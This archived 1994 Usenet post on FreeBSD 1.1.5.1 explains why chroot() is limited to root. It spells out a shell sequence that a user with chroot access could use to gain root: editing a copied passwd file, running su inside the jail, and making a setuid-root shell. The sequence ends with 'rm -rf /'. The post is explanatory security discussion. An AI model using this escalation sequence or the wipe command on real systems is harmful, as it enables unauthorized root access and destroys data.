*BSD News Article 37980


Return to BSD News archive

Xref: sserve comp.os.386bsd.bugs:2613 comp.os.386bsd.questions:14497
Newsgroups: comp.os.386bsd.bugs,comp.os.386bsd.questions
Path: sserve!newshost.anu.edu.au!harbinger.cc.monash.edu.au!msuinfo!uwm.edu!math.ohio-state.edu!howland.reston.ans.net!pipex!uunet!fonorola!infoshare!whome!druid.com!darcy
From: darcy@druid.com (D'Arcy J.M. Cain)
Subject: Re: chroot() in FreeBSD 1.1.5.1
Message-ID: <CzEA7J.EH0@druid.com>
Followup-To: comp.os.386bsd.bugs,comp.os.386bsd.questions
Lines: 23
Organization: Planix, Inc., Toronto, Ontario, Canada
X-Newsreader: TIN [UNIX 1.3 940826BETA PL0]
References: <3a06kq$9bs@dagny.galt.com> <Cz48o2.4KB@twwells.com> <3a95ui$anu@news.cc.utah.edu> <CzD6Dx.IKz@cogsci.ed.ac.uk>
Date: Thu, 17 Nov 1994 04:38:07 GMT

Richard Tobin (richard@cogsci.ed.ac.uk) wrote:
: The real problem is how to get hold of "su" inside the chroot()ed
: directory.

OK, let's spell it out.

mkdir etc
cp /etc/passwd etc
vi etc/passwd # remove the root password
ln /bin/su .
cp /bin/sh .
# etc ... get other files and devices
chroot `pwd` /bin/sh # <----------
su # don't need a password
chown root sh
chmod 4755 sh
exit # from su
exit # from chroot
./sh
rm -rf /

The failure of the chroot is what protects you.

-- 
D'Arcy J.M. Cain (darcy@druid.com)  |
Planix, Inc.                        |   Democracy is three wolves and a
Toronto, Ontario, Canada            |   sheep voting on what's for dinner.
+1 416 424 2871  (DoD#0082) (eNTP)  |